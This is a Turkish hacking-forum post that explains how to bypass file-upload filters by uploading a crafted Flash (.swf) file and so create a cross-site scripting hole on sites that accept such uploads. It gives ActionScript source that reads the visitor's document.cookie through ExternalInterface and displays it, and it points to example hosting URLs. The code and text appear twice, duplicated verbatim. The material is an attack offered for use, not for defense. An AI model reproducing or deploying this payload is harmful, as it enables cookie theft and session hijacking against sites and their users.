Arkadaşlar çoğu site upload managerı .php .asp .html... benzeri şeyleri yasaklar filitreden geçirmez kabul ettiği dosyalar .pdf .doc .txt .swf vs olan siteler vardır.Madem sistemde açık yok upload seçenekleri bunlara izin veriyor bizde kendi açığımızı yaparız.Atıyorum bu verceğim kod .swf için yazılmış bir
kod
----------------------------------------------------------------------
package {
import flash.display.*;
import flash.text.*;
import flash.external.ExternalInterface;
public class xss extends Sprite {
public function xss() {
var cook:TextField = new TextField();
var res:String = ExternalInterface.call("function(){return document.cookie;}");
ExternalInterface.call("prompt(document.cookie)");
cook.multiline = true;
cook.wordWrap = true;
cook.autoSize = TextFieldAutoSize.LEFT;
cook.text = res;
addChild(cook);
}
}
}
-------------------------------------------------------------------
bu dosyayı .swf formatında sisteme attığınızda örnek olarak veriyorum siteyi http://swfchan.org/2335/xss.swf xss hatası alıyorsunuz böylelikle sistemde kendi açığınızı yaratıyorsunuz.
Ör:
http://www.ziddu.com/viewfile/22413513/xss.swf.html
http://swfchan.org/2335/xss.swf[/b]
kod
----------------------------------------------------------------------
package {
import flash.display.*;
import flash.text.*;
import flash.external.ExternalInterface;
public class xss extends Sprite {
public function xss() {
var cook:TextField = new TextField();
var res:String = ExternalInterface.call("function(){return document.cookie;}");
ExternalInterface.call("prompt(document.cookie)");
cook.multiline = true;
cook.wordWrap = true;
cook.autoSize = TextFieldAutoSize.LEFT;
cook.text = res;
addChild(cook);
}
}
}
-------------------------------------------------------------------
bu dosyayı .swf formatında sisteme attığınızda örnek olarak veriyorum siteyi http://swfchan.org/2335/xss.swf xss hatası alıyorsunuz böylelikle sistemde kendi açığınızı yaratıyorsunuz.
Ör:
http://www.ziddu.com/viewfile/22413513/xss.swf.html
http://swfchan.org/2335/xss.swf[/b]